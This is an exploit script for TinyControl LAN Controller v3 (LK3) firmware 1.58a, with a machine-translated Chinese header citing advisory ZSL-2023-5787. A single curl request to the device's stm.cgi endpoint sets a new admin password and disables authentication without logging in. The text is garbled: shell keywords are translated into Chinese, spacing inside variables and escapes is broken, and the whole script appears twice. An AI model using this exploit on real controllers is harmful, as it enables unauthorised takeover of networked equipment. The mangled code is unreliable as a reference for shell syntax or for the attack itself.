#!/bin/bash
:'
利用标题: TinyControl LAN控制器V3(LK3)1.58A-远程管理员密码更改
利用作者:液态虫
vendor: tinyControl
产品网页: https://www.tinycontrol.pl
受影响的版本:=1.58a,HW 3.8
摘要: LAN控制器是一个非常通用的
允许您连接许多不同的设备
传感器并远程查看他们的读数,并且
远程控制各种类型的输出。
也可以结合两个功能
进入自动if-这是带日历的
何时- 然后。该设备提供用户界面
以网页的形式。网站礼物
读取各种类型的传感器:温度,
湿度,压力,电压,电流。也是如此
允许您配置设备,包括。事件
设置和控制多达10个输出。谢谢
为了支持许多协议,可能
从智能手机运营,收集和观察
服务器上的结果以及合作
使用基于TCP/IP和Modbus的其他I/O系统。
DESC:应用程序遭受不安全的访问
控制允许未经身心的攻击者
更改帐户密码和绕过身份验证
获得面板控制访问。
在: LWIP上测试
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2023-5787
Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5787.PHP
18.08.2023
'
设置-euo管道
ifs=$'\ n \ t'
如果[$#-ne 2];然后
echo -ne'\ nusage: $ 0 [ipaddr] [所需的admin PWD] \ n \ n'
出口
fi
IP=$ 1
PW=$ 2
en=$(echo -n $ pw | base64)
curl -s http://$ ip/stm.cgi?auth=00ywrtaw4=*$ en*dxnlcg==*dxnlcg===
#?auth=00(禁用身份验证,禁用升级),https://docs.tinycontrol.pl/en/lk3/api/access/
echo -ne'\ nadmin密码更改为:'$ PW
:'
利用标题: TinyControl LAN控制器V3(LK3)1.58A-远程管理员密码更改
利用作者:液态虫
vendor: tinyControl
产品网页: https://www.tinycontrol.pl
受影响的版本:=1.58a,HW 3.8
摘要: LAN控制器是一个非常通用的
允许您连接许多不同的设备
传感器并远程查看他们的读数,并且
远程控制各种类型的输出。
也可以结合两个功能
进入自动if-这是带日历的
何时- 然后。该设备提供用户界面
以网页的形式。网站礼物
读取各种类型的传感器:温度,
湿度,压力,电压,电流。也是如此
允许您配置设备,包括。事件
设置和控制多达10个输出。谢谢
为了支持许多协议,可能
从智能手机运营,收集和观察
服务器上的结果以及合作
使用基于TCP/IP和Modbus的其他I/O系统。
DESC:应用程序遭受不安全的访问
控制允许未经身心的攻击者
更改帐户密码和绕过身份验证
获得面板控制访问。
在: LWIP上测试
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2023-5787
Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5787.PHP
18.08.2023
'
设置-euo管道
ifs=$'\ n \ t'
如果[$#-ne 2];然后
echo -ne'\ nusage: $ 0 [ipaddr] [所需的admin PWD] \ n \ n'
出口
fi
IP=$ 1
PW=$ 2
en=$(echo -n $ pw | base64)
curl -s http://$ ip/stm.cgi?auth=00ywrtaw4=*$ en*dxnlcg==*dxnlcg===
#?auth=00(禁用身份验证,禁用升级),https://docs.tinycontrol.pl/en/lk3/api/access/
echo -ne'\ nadmin密码更改为:'$ PW